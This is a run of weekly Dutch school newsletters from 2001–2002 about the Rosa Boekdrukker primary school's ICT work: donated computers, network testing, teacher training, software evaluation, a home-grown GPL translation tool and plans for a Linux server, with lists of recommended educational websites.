We hebben antwoord gekregen op onze boze brief aan Kennisnet. Ons werd aangeraden een bepaald programma te downloaden, waarmee we de snelheid van het data-transport kunnen meten. Nu kunnen we nog gerichtere wedstrijden laten plaatsvinden tussen computer 47 en computer 48.

Werkgroep ICT.

Het is toch een flinke klus om alle computers na te lopen op software en daama de leerkrachten te vragen hoe de programma's bevallen. Het wordt steeds duidelijker, dat software die niet methode gebonden is, ook heel vrijblijvend is.

Computercursus voor ouders.

Op de oproep om mee te doen aan de computercursus zijn nog niet genoeg reacties gekomen. Erg jammer, want dan wordt het een eenmalige happening.

Gebruikte apparatuur.

Onze school is 10 computers rijker, dankzij onze gemeentelijk mecenas. Ze staan opgesteld in de bovenhal op tafels langs het raam. Dat raam zal binnen een jaar vervangen worden wegens een op handen zijnde verbouwing. John stond al in de startblokken om een vast blad te monteren. De bedoeling is, dat aan deze computers groepjes kinderen instructie krijgen op het gebied van tekstverwerken en internet. En eigenlijk was het ook bedoeld voor eventuele samenwerking met het buurthuis.

Doormeting netwerk.

Afgelopen woensdag heeft het netwerk, dat door Dirk en John is aangelegd de toets doorstaan. Het is officieel goedgekeurd als een UTP Cat5 netwerk. Het werd door een speciaal gecertificeerd bedrijf getest en goed bevonden. Hieperdepiep Hoera! ! !

E-mail.

Het is gelukt: Sinterklaas heeft per e-mail geantwoord. Zijn paard gaat met een speciale paardentakel het dak op.

Site van de week:

www.virusalert.nl Ga daar alsjeblieft een kijkje nemen en meld je aan bij hun gratis waarschuwingsbrief.
Trouwens, wisten jullie dat je je kan aanmelden voor kpn-online (www.kpn.com). Je kunt dan je telefoonrekening inzien en er allerlei analyses op loslaten (gratis). Op mijn top 15-nummers staan die van twee collega's.
www.rund.nl Je bent een rund als je met vuurwerk stunt. Site met voorlichting over vuurwerk.

Karin
Dirk

2001-12-14 w50

+++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 50 - 2001
Waar zijn we de afgelopen week mee bezig geweest?
+++++++++++++++++++++++++++++++++++++++++++++++++

Tweedehandscomputers.

Er staan nu in de bovenhal zes identieke computers naast elkaar met identieke muismatjes. De harde schijven zijn door Dirk gekloond. Er kan op de computers geinternet worden en er staat Office 97 op. Er zit geen geluidskaart in en geen cd-speler. Hier kunnen groepjes mensen tegelijkertijd aan een opdracht werken. Mogelijkheden: kinderen informatie laten zoeken, leerkrachten bijspijkeren, ouders internetles geven.

ICT werkgroep.

We zijn weer bij elkaar geweest. Bij elke computer zal een lijst komen te hangen met de regels voor bet computergebruik. De leerkrachten moeten erop toezien, dat de regels nageleefd worden. Over een tijdje gaan we ze evalueren. De volgende keer als we bij elkaar komen (22 januari) zullen we proberen conclusies te trekken uit ons software onderzoek. Welke software bevalt, welke kan weg. Daarop vooruitlopend hebben we de stukslicenties van het programma "ik reken" omgeruild voor een schoollicentie. Het is een aanvankelijk rekenprogramma dat door kleuters gebruikt kan worden.

Computercursus.

Computercursus voor ouders. Op dinsdag 15 januari 2002 zal de computercursus voor ouders van de Rosa Boekdrukker starten in bet buurthuis in de Chassestraat.

Printerserver.

Omdat we zoveel computers hebben was er een oud beestje over; prima geschikt als printerserver. Een extra printerpoortkaartje er in (hadden we nog liggen), de prima beeldschermkaart die in de computer bleek te zitten hebben we vervangen door een oud kaartje van 1 MB en we hadden nog een oud klein monitortje. Tezamen levert dat een prima printerserver voor alle computers op de begane grond. Daar kan nu naar keuze zwart/wit of kleur geprint worden. Niet weggooien dus die ouwe computers!

EHBO.

CD-rom speler vervangen door Dirk.

Gadget.

We hebben van John een scanner gekregen! Nu kunnen de winnende tekeningen van onze wedstrijd gepubliceerd worden!

Sites:

http://www.maki.nl/software/r_0606.html
Hier wordt een computerprogramma besproken waarmee leerlingen van groep 7 en 8 alvast kunnen wennen aan de Citotoets. Het gaat hier om een thuisversie, waarop voor 5 leerlingen de registratie bijgehouden wordt. Er bestaan ook schoolversies (.
http://www.dewerelddichtbij.nl/dewerelddichtbij/content.asp?pagkev=5487 Hier kun je je aanmelden voor de aardrijkskunde nieuwsbrief van ThiemeMeulenhoff. Daarin staan allerlei leuke tips om ideeen op te doen voor bet aardrijkskundeonderwijs. Ook digitaal materiaal.Neem eens een kijkje!
http://www.howstuffworks.com/index.htm
Een engelstalige site waar van alles en nog wat wordt uitgelegd. Bijvoorbeeld waar de traditie van Santa Claus en Rudolph vandaan komt, hoe email werkt, en ook hoe snoeren kerstverlichting in elkaar zitten.
www .amsterdam.nl
Kijk bij "kaart van Amsterdam". Scroll daar naar beneden naar "Atlas Amsterdam" en zoek je eigen huis/school en bekijk die bijvoorbeeld met een luchtfoto. Het is wel even puzzelen hoe het werkt. Ronald vond nog uit, dat onze school met met name genoemd wordt en heeft daar een mailtje over geschreven naar de site.

Karin
Dirk

2001-12-21 w51

+++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 51 - 2001
Waar zijn we de afgelopen week mee bezig geweest?
+++++++++++++++++++++++++++++++++++++++++++++++++

Tweedehandscomputers.

Aan onze nieuwe opstelling in de bovenhal heeft een paar keer een groepje kinderen gewerkt. Een keer waren het leerlingen uit groep 6 die Rosa's Kletshoek uitprobeerden. We kunnen de computers tegelijk in- en uitschakelen. Na twee dagen kwamen we erachter dat dat de reden was, dat de stop soms doorsloeg. Het blijkt nu dat de electricien aile computeraansluitingen op een groep heeft gezet. Dat moet dus veranderd worden.

Website.

Op onze web site is nu een nieuwe rubriek: tekening van de week. Het leert ons, dat we een tekening erop moeten zetten die veel harder ingekleurd is. We hebben in de hal van de school de tekeningen hangen van onze tekenwedstrijd. Volgendjaar gaan we de winnende tekeningen op onze site zetten.

Computercursus voor ouders.

Op dinsdag 15 januari 2002 zal de computercursus voor ouders van de Rosa Boekdrukker starteD in het buurthuis in de Chassestraat. We hebben nu DOg twee ouders nodig.

Software.

We merken dat we, nu de hardware eigenlijk redelijk probleemloos loopt, meer tijd krijgen om ons te verdiepen in betere software. We hebben ons opgegeven om als testschool mee te werken voor de site http://www.maki.nl. We gaan na de kerstvakantie een paar programma's beoordelen van het bedrijf Cedicu (http://www.cedicu.nl). Op de homepage doorklikken op Klik hier voor een overzicht van de reeds geproduceerde lespakketten Het programma heet "laat eens zien" en bestaat uit meerdere lespakketten. We hebben een lijstje gemaakt van criteria die we van belang vinden voor het beoordelen van software. Graag aanvullingen, opmerkingen, commentaar!

Criteria (in willekeurige volgorde; 't is werk in uitvoering) voor het beoordelen van software:

 1. hebben we er behoefte aan?
 2. ontlast het de leerkracht?
 3. wat is de verhouding spelen/leren?
 4. sluit het aan bij de in de klas behandelde les/leerstof?
 5. Is het oefenstof die hoort bij de klas?
 6. Is er goede feedback naar de leerling?
 7. Hoe leerkracht-vriendelijk is het programma? Is er een registratieprogramma, waarmee we kunnen zien hoe elk kind het gedaan heeft? En waarmee het de volgende keer verder gaat?
 8. Moet er veel uitgelegd worden door de leerkracht voordat een kind ermee kan werken?
 9. Wordt er getoetst? Wordt er geoefend?

We kregen ook het programma "ik reken" binnen. De vier stuks licenties die we hadden hebben we ingeruild voor een schoollicentie. Het is bedoeld voor de groepen 1,2 en 3. Het registreert wat de kinderen hebben gedaan. De kleuterafdeling is heel erg te spreken over het programma. We zijn nu op zoek naar een kleuterprogramma voor lezen. Is "ik lees" daar te moeilijk voor?

Gouden regels.

We zijn oak bezig om in de school de regels die horen bij het gebruik van computers en internet te implementeren. Hier zijn ze: Graag commentaar, aanvullingen, opmerkingen!

GOUDEN regels voor computer- en internetgebruik

Nascholing.

Meteen de eerste dinsdag na de kerstvakantie gaan de leerkrachten van de groepen 1 t/m 3 weer bijscholen. We gaan 4 programma's bekijken en leren beoordelen, een rekenprogramma en wat woordenschat programma's (pluspunt, Babbelbij, Schatkist en het Taalplan kleuters).

EHBO

Koptelefoon door Dirk gerepareerd.
Haakjes voor koptelefoons vastgeplakt.

Deze week een site ter aanbeveling.

Breinstein: http://www.fontys.nl/paboeindhoven/breinstein/default.htm
Hierin een digiteek voor kinderen boordevol links naar educatieve sites.

Goede vakantie en een voorspoedig 2002
Karin
Dirk

2002-01-11 w02

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 2 - 2002
Waar zijn we de afgelopen week op ICT gebied mee bezig geweest?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Koud!

Deze week was een ijskoude week, omdat de ketel van de verwarming stuk was en zelfs helemaal vervangen moest worden. Het was ijskoud in de school. De leerlingen moesten naar huis, de vingers vroren vast aan het toetsenbord, we warmden onze handen aan de monitoren. Kortom, er viel niet te werken. Het computerwerk vond dus grotendeels buiten de school plaats.

Nascholingen.

Dinsdag was er nascholing voor de leerkrachten van groep 1 t/m 3. We gaan ons bezighouden met het beoordelen van software. Criteria kwamen uit de leerkrachten zelf en ook van de onderwijs begeleidingsdienst. Er is behoefte aan meer structuur, d.w.z. dat er in elke (kleuter)klas een vast pakket aan software zou moeten zijn, wat door de kinderen doorlopen moet worden. Het accent ligt nu op taalverwerving, maar we hebben ook een heel leuk rekenprogramma gezien.

Donderdag gingen de overige leerkrachten naar het ABC. Daar was het warm! In de komende bijeenkomsten gaat het over tekstverwerking binnen de taalmethode van Taalleesland. Een aantal opdrachten is geschikt om met een tekstverwerkingsprogramma te maken. Dat gaan we in eerste instantie zelf proberen en daarna met de kinderen. We hebben ook nog wat gedaan aan uitbreiding van onze eigen vaardigheid.

Computercursus voor ouders.

Op dinsdag 15 januari 2002 zal de computercursus voor ouders van de Rosa Boekdrukker starten in het buurthuis in de Chasséstraat.

Software.

Bij het Kruitvat is een cd rom “de natuur” te koop voor minder dan 4 euro. Kinderen kunnen hier heel leuk allerlei informatie opzoeken, geïllustreerd door spraak en filmpjes. (vanaf 8 jaar/groep 4)

Nadeel: schermresolutie moet ingesteld worden op 256 kleuren, dan pas wordt het hele scherm gevuld. Door het beeldschermpictogram in de taakbalk te zetten kan dat vrij eenvoudig aangepast worden.

sites:

http://www.leerlingzorg.kennisnet.nl/nieuwsbrief/nulnummer.html

Hier kunt u zich aanmelden voor allerlei informatie op gebied van leerlingenzorg.

http://www.digischool.nl/po/community34 Via Kennisnet kun je je opgeven voor “kringen”. Dat zijn jaarklasomgevingen waar allerlei informatie beschikbaar is voor lesideeën. In dit geval voor groep 3 en 4. Nu zijn ze bezig aan een euro site en dat sluit ook leuk aan bij de school t.v. van huisjeboompjebeestje, a.s. maandag.

Karin
Dirk

2002-01-18 w03

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 3 - 2002 18 januari 2001
Waar zijn we de afgelopen week op ICT gebied mee bezig geweest?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Temperatuur.

We hebben een nieuwe cv ketel. Meteen berekend op de extra lokalen die we erbij krijgen volgend jaar.

Weinig nieuws.

Wegens adv, ketel, griep en invallen hebben we niet veel gedaan op ICT gebied in de school. Toch een uitgebreide nieuwsbrief: Zie onder 'Nieuw Programma'.

Nascholingen.

Naar aanleiding van de nascholingscursussen zijn we bezig om allerlei software te beoordelen. Aan de hand van een lijst criteria zoeken we geschikte programma's voor taal en rekenen bij de kleuters. De leerkrachten uit de hogere klassen maken opdrachten uit Taalleesland in Word. Eerst zelf proberen en daarna moeten de leerlingen het gaan doen.

PC Privé.

Er is weer een collega over de streep. Nu is er een computer besteld bij de PC-Dokter. Hoera, er komt dus weer een emailadres bij binnenkort.

APS.

Van het APS kregen we bericht, dat er een hele nieuwe licentieregeling voor de Microsoft Software voor scholen geldt. Denk je alles goed geregeld te hebben, kun je weer die kleine lettertjes gaan uitspitten. Het wordt tijd om iets te bedenken om van Microsoft af te komen!

Sites:

www.digischool.nl
Onder "meesters en juffen" kun je de leeftijd kiezen van de kinderen waarmee je werkt. Er is daar ook een forum waar je vragen kunt stellen of onderwerpen ter discussie kunt stellen. Ik had antwoord op een rekenvraag!

Nieuw Programma.

We hebben al een tijdje het idee dat we de ICT boel een beetje op orde beginnen te krijgen. Het netwerk is af, de computers stromen binnen en er is weinig onderhoud, dus tijd voor 'de grote klapper': Eigen software ontwikkeling! We hebben zo onze ideeën en behoeften en kwamen na wat overleg tot een eerste idee: een dictee programma per computer. Daar is veel over te vertellen, maar vooral dat het nog niet van de grond is gekomen. We besloten een stapje terug te doen en iets te maken dat straks voor 'Dictee' bruikbaar zou zijn en voor nu iets bruikbaars zou opleveren. Het werd: 'Vertaling'. Omdat het een programma bleek dat voor veel talen interessant is, kregen we er subsidie voor en zo konden we het laten ontwikkelen. Mark de Haan is de programmeur.
Hieronder de beschrijving. Nu dat het programma er is, blijkt er nog veel meer mee te kunnen dan we dachten en zo komt er dus al heel gauw een uitgebreidere versie. We houden jullie op de hoogte. De beschrijving is in het Engels, omdat het programma wereldwijd is aangemeld op de sites die 'iedereen' daarvoor kent. De software is onder GPL (General Public Licensce) licensie, wat wil zeggen dat 't gratis is, vrij copieerbaar, verspreidbaar en veranderbaar.

Translation

'Translation' is a web-based language teacher's tool. A teacher can add sentences and their translations to a database via a browser. He/she can choose from the database which sentences to assign to a group or an individual student. He can give a header and a footer to the prepared translation and activate it for use. He can add students to the database. The students can browse to their part of 'Translation', log in, and do their excercise. When a student has completed the task, a mail is sent to him and the teacher, containing the original sentences and the correct translation by the teacher and the pupil's version. The Administrator of 'Translation' can add teachers to the database via the web. She can also edit the languagage file to the language needed.

Onnodig hier te zeggen dat er dus ook een Nederlandstalige versie is. Het programma blijkt meer te kunnen dan we dachten. Je kunt er meer over lezen op http://translation.starwave.nl . Daar kun je het ook downloaden. Als je het programma eens wilt wilt uitproberen zonder het meteen te installeren op je schoolserver, schrijf ons ons dan even, dan krijg je een inlognaam en wachtwoord en kun je je gang gaan! Het programma draait op iedere server. Leuk nieuws dus voor de CIAO mensen.
Overigens, half februari is 'Dictee' klaar. Het belooft net zo'n interessant programma te worden als 'Vertaling'.

Mailserver

Deze week komt de BIC van een 'vreemd' adres. De mailserver van A2000 werkt weer eens niet goed.

groeten,
Karin
Dirk

2002-01-25 w04

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 4 - 2002 25 januari 2002
Waar zijn we de afgelopen week op ICT gebied mee bezig geweest?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze week

Een rustige ICT week. We moeten er nog een beetje inkomen. We hebben Mark de Haan opdracht gegeven om het programmeren van 'Dictee' te beginnen; ons volgende softwareproject. Dirk voert regelmatig overleg per e-mail en telefoon om te zorgen dat het programma gaat doen wat we willen. De samenwerking loopt op rolletjes. Je hoort er binnenkort meer van.

Werkgroep ICT.

Deze week is de werkgroep weer bijeen geweest. Er is geïnventariseerd welke software gebruikt wordt in de verschillende klassen. Geconstateerd werd, dat veel van de aanwezige software niet gebruikt wordt. We gaan nu bekijken welke programma's en computervaardigheden er per jaargroep gewenst zijn om zo te komen tot een vast computer curriculum. Daardoor zal waarschijnlijk de vrijblijvendheid, die hier en daar gevoeld wordt afgelopen zijn.

Computers op de gang.

Op onze eerst verdieping staan zes computers naast elkaar waarop alleen tekstverwerken en internetten mogelijk is. Hierop zijn nu regelmatig groepjes kinderen aan het werk. Er zijn opeens zoveel meer mogelijkheden om kinderen te begeleiden. Nieuw idee is ook om op het bureaublad een Word document te plaatsen waarop direct naar een internet site doorgelinkt kan worden. Dit biedt de mogelijkheid duidelijke internetopdrachten aan leerlingen geven.

Linux

Door het veranderde beleid van Microsoft t..a.v. schoollicensies is er aardig wat commotie ontstaan. Het was in 't nieuws en we lezen erover in de nieuwsgroep nl.onderwijs.nieuwe-media. In de diverse Linux groepen die zich met onderwijs bezighouden wordt de zaak met zekere opgewektheid gevolgd.. Voorlopige conclusies: Als je met je computers alleen maar Internet en kantoortoepassingen (word, excel, powerpoint etc) draait, dan kun je gerust over op Linux. Het StarOffice pakket is in bedieningsgemak minstens vergelijkbaar met Microsoft Office en bestanden zijn ermee uitwisselbaar. Dit feit maakt het CIAO project welhaast overbodig en zeker te duur. Verder zijn er Linux servers beschikbaar voor het MKB die zo zijn ingericht dat zelfs de kruidenier zonder IT ervaring de systeembeheertaken kan uitvoeren. Dat biedt perspectieven voor onderwijzers, vinden wij. Minder goed is het nog gesteld met educatieve (open-source) software. Er is nog te weinig en het blijft aldoor maar zoeken.. Maar vanuit de diverse groepen die zich met Linux, open-source en onderwijs bezighouden komen wel initiatieven om multi-platform software te ontwikkelen. Hier wat Linux links voor de lief- en lefhebbers:

Sites:

http://www.rnw.nl/kids/fun/spellen/trouwjurk/pagina.html Hier kun je meedoen met de verkiezing van de trouwjurk van Maxima.
http://www.fi.uu.nl/rekenweb/ Op deze site van het Freudenthalinstituut staan allerlei online rekenspelletjes voor groep 1 t/m 8.

Karin
Dirk

2002-02-01 w05

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 5 - 2002 1 februari 2002
Waar zijn we de afgelopen week op ICT gebied mee bezig geweest?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Apparatuur.

Bij het installeren van het programma “ik-reken” voor de kleutergroepen bleek, dat er twee computers wat gammel zijn. Eén diskettestation haperde bij het installeren. En de andere computer met windows 95 kon een site niet openen. Windows 98 erop, maar dat was heel onstabiel. Toen heeft Dirk de computer mee naar huis genomen. Het vervolg staat hieronder.

Mammaplank gemold.

Dirk heeft een moederbord naar de eeuwige jachtvelden geholpen. Hij lette niet goed op bij het upgraden en installeren van geheugen.. Stom. Maar we zouden het hier niet melden als we niet ook een vraag erbij hadden: Heeft iemand nog een AT moederbord liggen? Liefst voor een processor tot zo'n 200 Mhz.. Meer mag natuurlijk ook : )). Graag een mailtje sturen en dan halen we 'm op. Als er een kapotte computer omheen zit, dan nemen we die ook mee.

Computercursus onderbouw.

Bij de nascholing hebben we weer een aantal programma's beoordeeld. Als Taalprogramma's gaan we Schatkist met de Muis en Letterpret nader onder de loep nemen. Het rekenprogramma Pluspunt viel bij nader onderzoek tegen.

Bij de volgende nascholing gaan we het hebben over creatieve toepassingen met de computer voor kleuters.

Bijscholing ICT-coördinator.

Elk jaar organiseert het ABC een cursus genaamd: "nieuwe ontwikkelingen voor de ICT coördinator". Op vijf bijeenkomsten worden nieuwe wetenswaardigheden uitgewisseld. Afgelopen donderdag ging de bijeenkomst over systeembeheer. Hoe kun je als ICT coördinator jezelf werk besparen door handige programma's te installeren, waardoor leerlingen de configuraties niet overhoop halen. Ook werd uitgelegd hoe je de BIOS setup kunt beveiligen met een wachtwoord.

Bij een van de volgende bijeenkomsten moeten we een oude computer openschroeven.

Sites:

http://disc.server.com/Indices/179026.html Hier kun je je felicitaties kwijt aan Maxima en Willem Alexander.

www.computertotaal.nl biedt fora (forums) over allerlei computeronderwerpen.

En ik ben nog steeds heel enthousiast over de kringen bij www.digischool.nl. Ik heb heel wat reacties gehad over mijn vragen over de rekenmethodes WIG3 en Wis en Reken.

Karin
Dirk

2002-02-08 w06

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 6 - 2002 8 februari 2002
Waar zijn we de afgelopen week op ICT gebied mee bezig geweest?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze week weer een nieuwsbrief vol met “links”. Volgende week geen nieuwsbrief, dus moeten jullie het hier de hele crocusvakantie mee doen, vandaar.

ICT in De Baarsjes.

Afgelopen maandag heeft er een gesprek plaatsgevonden met Kees Vos. Hij coördineert de ICT samenwerking tussen de 5 openbare basisscholen in De Baarsjes. In dat gesprek hebben we besproken wat we aan het doen zijn op de Rosa Boekdrukker. Een soort tussentijdse evaluatie. Het bestuur heeft nog geen duidelijk ICT beleid. Wel begrepen we in het gesprek, dat CIAO in elk geval geen optie is. Misschien een samenwerking met de scholen in Oud Zuid. Voor ons is samenwerking op onderwijsinhoudelijk/didactisch gebied vooral gewenst. (les-ideeën uitwisselen)

Na de crocusvakantie moeten alle leerkrachten weer een aantal vragen beantwoorden. Uit de verplicht in te vullen vragenlijsten moet duidelijk worden op welk gebied scholing gewenst is.

In maart/april komt er weer een studiebijeenkomst met alle scholen.

Er wordt nu gewerkt aan een begroting.

School en Computer

Op woensdag 27 februari is er weer een GRATIS computerbeurs in Amsterdam. http://www.school-computer.nl/ Allerlei educatieve software wordt hier getoond.

Maar misschien veel interessanter: http://www.digischool.nl/po/community78/feb27/wsprogramma.html

Een workshop gehouden in de Hogeschool Holland, ook op woensdag 27 februari. Georganiseerd door de communities van de Digischool.

ICT beleidsplan.

Er wordt momenteel gewerkt aan een ICT beleidsplan. Een standaard model + voorbeelden van hoe andere scholen dat hebben ingevuld, aangevuld met hoe het bij ons gaat, moet ervoor zorgen, dat dit plan over een maand klaar is.

http://www.leren.nl/rubriek/onderwijs/ICT_en_onderwijs/beleidsplan/

Niemand hoeft het wiel nog een keer uit te vinden: ook hier zooooveeeeel tips!

Hardware.

Weer een computer vervangen (bij de kleuters met een haperende a-drive) en een computer aangesloten (in de hal op de 1e verdieping, bedoeld voor groep 6).

We hadden nog steeds een paar computers niet ingedeeld die we van ons gemeentelijk bedrijf hebben gekregen.

Verder is er in goede samenwerking een oude computer met restanten en een nieuwe buitenkant door de man van een collega tot “nieuwe” pentium 450 in elkaar gesleuteld. Goed zo Jan!! Fijn, dat je dit hebt gedaan! Dirk gaat hier een server van maken. Een server is een soort moedercomputer waar alle computers op het netwerk programma’s vandaan kunnen halen en documenten op kunnen zetten. Dat is handig, als je op computer 14 hebt gewerkt aan een document en de volgende keer op computer 36 verder gaat.

De server wordt een Linux met Samba. Volgens de kenners stabieler, sneller en goedcoper dan Windows NT. En met het laatste wordt bedoeld de TCO (Total Cost of Ownership).

Nascholing groep 4 t/m 8.

Dit was de tweede bijeenkomst over tekstverwerking in combinatie met Taalleesland. Iedereen had opdrachten uitgeprobeerd/getest(!) en nu is het de bedoeling, dat we de leerlingen één van die opdrachten laten doen.

Het gaat om:

Software beoordeling.

Voor de Maki site, in samenwerking met het OCA hebben we een software programma ter beoordeling gekregen. We gaan het programma “meten” van Cédicu beoordelen met groep 5, en 5/6 . We hebben de spullen deze week ontvangen. We gaan het na de crocusvakantie doen.

Wederom uit de site van Maki.

Leerkracht op internet

Fred Pals, ICT-coördinator van de Openbare Daltonschool Het Karrepad in Groningen, maakt zich sterk voor meer samenwerking op ICT-terrein. 'Wij hebben begin deze maand een server besteld. Tegelijkertijd heeft een aantal andere basisscholen uit de buurt dezelfde bestelling gedaan. Sinds een half jaar voeren we met dat groepje scholen regelmatig overleg. We ondersteunen elkaar. Systeembeheer is een zware taak. Wij komen uit de onderwijspraktijk, maar worden geacht manusje-van-alles te zijn: de computers draaiende houden, software beheren, server inrichten, het is een heel takenpakket. Wij hebben voor 550 leerlingen 140 computers staan, op 3 lokaties. Eigenlijk zou er per 60 computers een systeembeheerder moeten zijn. Daarom helpen we elkaar. Ook hebben we veel hulp van onze Denktank: een groepje ouders dat meedenkt over ICT-zaken. Daar komen veel goede tips uit, en ook weten ouders wel eens via hun werk wat computers voor ons te regelen.

sites:

Deze week een hele waslijst uit het E-zine van de Maki site:

Jaaroverzicht favoriete sites
Al een jaar wordt in deze nieuwsbrief wekelijks een leerkracht ondervraagd over zijn/haar favoriete websites/educatieve programma’s. Tijd om de balans op te maken. Welke websites en software doen het het best in de klas?

Websites

1. Kennisnet (www.kennisnet.nl)

Hoe kan het ook anders: Kennisnet werd door bijna alle leerkrachten genoemd. Vaak is het vooral de belofte van Kennisnet die de harten sneller doet kloppen: veel scholen hebben hoge verwachtingen, maar wachten nog op servers, kabels of feitelijke aansluiting. De leerkrachten die al wel met Kennisnet werken zijn vooral enthousiast over de Programmamatrix en de Kringen.

2. Taptoe Spreekbeurtensite (www.taptoe.nl) is vooral bij de leerlingen heel populair, voor hun werkstukken en spreekbeurten.

3. Schooltelevisie (www.teleacnot.nl)

Veel scholen kijken naar het Weekjournaal en naar Nieuws uit de natuur, en de websites sluiten daar prima bij aan.

4. De Startpagina (www.startpagina.nl) en haar dochters: de PABO-pagina, de ADHD-pagina, de Dyslexiepagina, de Onderwijspagina, de Basisonderwijspagina, en zo kunnen we nog wel even doorgaan. Stuk voor stuk handige, goed bijgehouden portals.

5. De digitale school (www.digischool.nl): geliefd als ideeënbron.

Software

Veel leerkrachten hebben nogal wat te mopperen over de beschikbare educatieve software. Te duur, niet interactief genoeg, gehannes met licenties, niet geschikt voor netwerken - er wordt veel geklaagd. Toch maken nagenoeg alle geïnterviewde scholen veelvuldig gebruik van educatieve programma’s:

 1. Wereld in Getallen Een standaardmethode, die vooral wordt gewaardeerd om de feedback die leerlingen van het programma krijgen.

 2. Veilig Leren Lezen. Voor remedial teaching en NT2-onderwijs wordt het programma 'Veilig leren lezen in stapjes' veel genoemd.

 3. De software van Ambrasoft, voor rekenen en taal. Deze programma's worden minder genoemd dan de bovenstaande programma’s, maar leerkrachten die deze programma’s gebruiken zijn unaniem laaiend enthousiast.

 4. Schatkist is voor kleuters een gewaardeerde taalmethode.

 5. Programma’s van het NIB worden vooruitstrevend genoemd. Vooral Luister Maar en Taalplan (dat nu wordt uitgegeven door Dodo Software) zijn populair.

Kijk voor de volledige lijst op de Maki-site. (!!!!!!!!! doen!!!!)

alvast een prettige crocusvakantie
Karin
Dirk

2002-02-15 w07

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 7 - 2002
Waar zijn we de afgelopen week op ICT gebied mee bezig geweest?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze week weer een nieuwsbrief vol met “links”. Volgende week geen nieuwsbrief, dus moeten jullie het hier de hele crocusvakantie mee doen, vandaar.

ICT in De Baarsjes.

Afgelopen maandag heeft er een gesprek plaatsgevonden met Kees Vos. Hij coördineert de ICT samenwerking tussen de 5 openbare basisscholen in De Baarsjes. In dat gesprek hebben we besproken wat we aan het doen zijn op de Rosa Boekdrukker. Een soort tussentijdse evaluatie. Het bestuur heeft nog geen duidelijk ICT beleid. Wel begrepen we in het gesprek, dat CIAO in elk geval geen optie is. Misschien een samenwerking met de scholen in Oud Zuid. Voor ons is samenwerking op onderwijsinhoudelijk/didactisch gebied vooral gewenst. (les-ideeën uitwisselen)

Na de crocusvakantie moeten alle leerkrachten weer een aantal vragen beantwoorden. Uit de verplicht in te vullen vragenlijsten moet duidelijk worden op welk gebied scholing gewenst is.

School en Computer

Op woensdag 27 februari is er weer een GRATIS computerbeurs in Amsterdam. http://www.school-computer.nl/ Allerlei educatieve software wordt hier getoond.

Maar misschien veel interessanter: http://www.digischool.nl/po/community78/feb27/wsprogramma.html

Een workshop gehouden in de Hogeschool Holland, ook op woensdag 27 februari. Georganiseerd door de communities van de Digischool.

ICT beleidsplan.

Er wordt momenteel gewerkt aan een ICT beleidsplan. Een standaard model + voorbeelden van hoe andere scholen dat hebben ingevuld, aangevuld met hoe het bij ons gaat, moet ervoor zorgen, dat dit plan over een maand klaar is.

http://www.leren.nl/rubriek/onderwijs/ICT_en_onderwijs/beleidsplan/

Niemand hoeft het wiel nog een keer uit te vinden: ook hier zooooveeeeel tips!

Hardware.

Weer een computer vervangen (bij de kleuters met een haperende a-drive) en een computer aangesloten (in de hal op de 1e verdieping, bedoeld voor groep 6).

We hadden nog steeds een paar computers niet ingedeeld die we van ons gemeentelijk bedrijf hebben gekregen.

Verder is er in goede samenwerking een oude computer met restanten en een nieuwe buitenkant door de man van een collega tot “nieuwe” pentium 500 in elkaar gesleuteld. Goed zo Jan!! Fijn, dat je dit hebt gedaan! Dirk gaat hier een (samba)server van maken. Een server is een soort moedercomputer waar alle computers op het netwerk programma’s vandaan kunnen halen en documenten op kunnen zetten. Dat is handig, als je op computer 14 hebt gewerkt aan een document en de volgende keer op computer 36 verder gaat.

Nascholing groep 4 t/m 8.

Dit was de tweede bijeenkomst over tekstverwerking in combinatie met Taalleesland. Iedereen had opdrachten uitgeprobeerd/getest(!) en nu is het de bedoeling, dat we de leerlingen één van die opdrachten laten doen.

Het gaat om:

Software beoordeling.

Voor de Maki site, in samenwerking met het OCA hebben we een software programma ter beoordeling gekregen. We gaan het programma “meten” van Cédicu beoordelen met groep 5, en 5/6 . We hebben de spullen deze week ontvangen. We gaan het na de crocusvakantie doen.

Wederom uit de site van Maki.

Leerkracht op internet

Fred Pals, ICT-coördinator van de Openbare Daltonschool Het Karrepad in Groningen, maakt zich sterk voor meer samenwerking op ICT-terrein. 'Wij hebben begin deze maand een server besteld. Tegelijkertijd heeft een aantal andere basisscholen uit de buurt dezelfde bestelling gedaan. Sinds een half jaar voeren we met dat groepje scholen regelmatig overleg. We ondersteunen elkaar. Systeembeheer is een zware taak. Wij komen uit de onderwijspraktijk, maar worden geacht manusje-van-alles te zijn: de computers draaiende houden, software beheren, server inrichten, het is een heel takenpakket. Wij hebben voor 550 leerlingen 140 computers staan, op 3 lokaties. Eigenlijk zou er per 60 computers een systeembeheerder moeten zijn. Daarom helpen we elkaar. Ook hebben we veel hulp van onze Denktank: een groepje ouders dat meedenkt over ICT-zaken. Daar komen veel goede tips uit, en ook weten ouders wel eens via hun werk wat computers voor ons te regelen.

sites:

Deze week een hele waslijst uit het E-zine van de Maki site:

Jaaroverzicht favoriete sites
Al een jaar wordt in deze nieuwsbrief wekelijks een leerkracht ondervraagd over zijn/haar favoriete websites/educatieve programma’s. Tijd om de balans op te maken. Welke websites en software doen het het best in de klas?

Websites

1. Kennisnet (www.kennisnet.nl)

